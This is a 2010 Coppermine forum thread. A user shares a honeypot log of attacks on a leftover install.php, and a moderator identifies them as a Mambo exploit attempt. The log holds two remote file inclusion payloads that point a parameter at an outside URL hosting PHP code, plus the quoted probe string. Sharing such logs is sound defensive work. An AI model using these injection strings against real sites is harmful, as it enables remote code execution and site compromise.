Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Attack to CPG 1.4.x target "install.php"  (Read 6390 times)

0 Members and 1 Guest are viewing this topic.

brix

  • Coppermine newbie
  • Offline Offline
  • Posts: 4
Attack to CPG 1.4.x target "install.php"
« on: August 27, 2010, 10:45:57 am »

Hi all,

I know that after installation you must delete "install.php" for any CMS but often that does not happen.

One of our users (an Italian website) has recently been attacks on the file "install.php" so I suggested to remove it.

He did and one of his staff created a false "install.php" bait running log of attempts to hack.

I hope it will be useful to know which attack is executed, and for that reason I Paste the contents of the log created bait:
Quote
Log:

Sunday 15th of August 2010 09:09:59 AM - 146.83.237.120 - Mozilla/5.0 - mosConfig_absolute_path=http://www.songdosarang.org/skin/head??
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error=http://devilbat.fileave.com/zfxid1.txt?

Comment:

Caught!
It seems that finally the fish has the bait!
On the day of August there were a couple of intrusion attempts, the result is these two lines:
Sunday 15th of August 2010 9:09:59 AM - 146.83.237.120 - Mozilla/5.0 - http://www.songdosarang.org/skin/head mosConfig_absolute_path =?
Sunday 15th of August 2010 10:12:14 AM - 70.86.235.162 - Mozilla/5.0 - error = http://devilbat.fileave.com/zfxid1.txt?

The first IP is from Chile, the university network and the second by a U.S. hosting service, probably in both cases it is a botnet and the owners of IP are unaware and innocent.

Both attacks link to a URL in the parameters passed to the installer of Coppermine by visiting the url you get (as expected) the string php who wanted to inject this site:
<? Php / * * ZFxID / echo ("Shiro". "Hige") die ("Shiro". "Hige") / * * ZFxID /?>

If this thread is somewhat useful, I was pleased to collaborate in the protection of Coppermine, with the help of our users. Thanks
Logged

brix

  • Coppermine newbie
  • Offline Offline
  • Posts: 4
Re: Attack to CPG 1.4.x target "install.php"
« Reply #1 on: August 27, 2010, 10:57:28 am »

sorry I pushed the button "solved" but is not :-(
Logged

Nibbler

  • Guest
Re: Attack to CPG 1.4.x target "install.php"
« Reply #2 on: August 27, 2010, 02:27:28 pm »

That's a mambo exploit attempt. It won't do anything to Coppermine.
Logged
Pages: [1]   Go Up
 

Page created in 0.017 seconds with 20 queries.